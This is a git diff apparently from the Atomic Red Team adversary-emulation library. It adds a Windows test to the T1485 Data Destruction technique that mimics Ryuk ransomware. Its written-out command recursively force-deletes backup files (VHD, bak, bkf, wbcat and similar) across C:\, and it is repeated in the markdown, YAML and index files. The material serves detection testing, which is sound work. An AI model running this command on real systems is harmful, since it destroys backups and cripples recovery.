diff --git a/atomics/T1485/T1485.md b/atomics/T1485/T1485.md
index d57cabe4..ebd00c73 100644
--- a/atomics/T1485/T1485.md
+++ b/atomics/T1485/T1485.md
@@ -18,6 +18,8 @@ To maximize impact on the target organization in operations where network-wide a
- [Atomic Test #5 - macOS/Linux - Overwrite file with DD](#atomic-test-5---macoslinux---overwrite-file-with-dd)
+- [Atomic Test #6 - Windows - Delete Backup Files](#atomic-test-6---windows---delete-backup-files)
+
@@ -114,4 +116,20 @@ dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+
+
+## Atomic Test #6 - Windows - Delete Backup Files
+Deletes backup files in a manner similar to Ryuk ransomware.
+
+**Supported Platforms:** Windows
+
+
+#### Run it with `command_prompt`!
+```
+del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
+```
+
+
+
diff --git a/atomics/T1485/T1485.yaml b/atomics/T1485/T1485.yaml
index a0c216cc..cb61c927 100644
--- a/atomics/T1485/T1485.yaml
+++ b/atomics/T1485/T1485.yaml
@@ -87,4 +87,16 @@ atomic_tests:
executor:
name: bash
command: |
- dd of=#{file_to_overwrite} if=#{overwrite_source}
\ No newline at end of file
+ dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+- name: Windows - Delete Backup Files
+ description: |
+ Deletes backup files in a manner similar to Ryuk ransomware.
+
+ supported_platforms:
+ - windows
+
+ executor:
+ name: command_prompt
+ command: |
+ del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
\ No newline at end of file
diff --git a/atomics/index.md b/atomics/index.md
index 88270e2c..e1b2e7c2 100644
--- a/atomics/index.md
+++ b/atomics/index.md
@@ -474,6 +474,7 @@
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
- Atomic Test #5: macOS/Linux - Overwrite file with DD [centos, linux, macos, ubuntu]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/index.yaml b/atomics/index.yaml
index 243d8e5c..116f896d 100644
--- a/atomics/index.yaml
+++ b/atomics/index.yaml
@@ -13903,7 +13903,19 @@ impact:
default: "/var/log/syslog"
executor:
name: bash
- command: dd of=#{file_to_overwrite} if=#{overwrite_source}
+ command: 'dd of=#{file_to_overwrite} if=#{overwrite_source}
+
+'
+ - name: Windows - Delete Backup Files
+ description: 'Deletes backup files in a manner similar to Ryuk ransomware.
+
+'
+ supported_platforms:
+ - windows
+ executor:
+ name: command_prompt
+ command: del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.*
+ c:\backup*.* c:\*.set c:\*.win c:\*.dsk
'':
technique:
x_mitre_data_sources:
diff --git a/atomics/windows-index.md b/atomics/windows-index.md
index aef1b765..a4a50715 100644
--- a/atomics/windows-index.md
+++ b/atomics/windows-index.md
@@ -330,6 +330,7 @@
- Atomic Test #2: Windows - Delete Windows Backup Catalog [windows]
- Atomic Test #3: Windows - Disable Windows Recovery Console Repair [windows]
- Atomic Test #4: Windows - Overwrite file with Sysinternals SDelete [windows]
+ - Atomic Test #6: Windows - Delete Backup Files [windows]
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1491 Defacement [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
- T1488 Disk Content Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)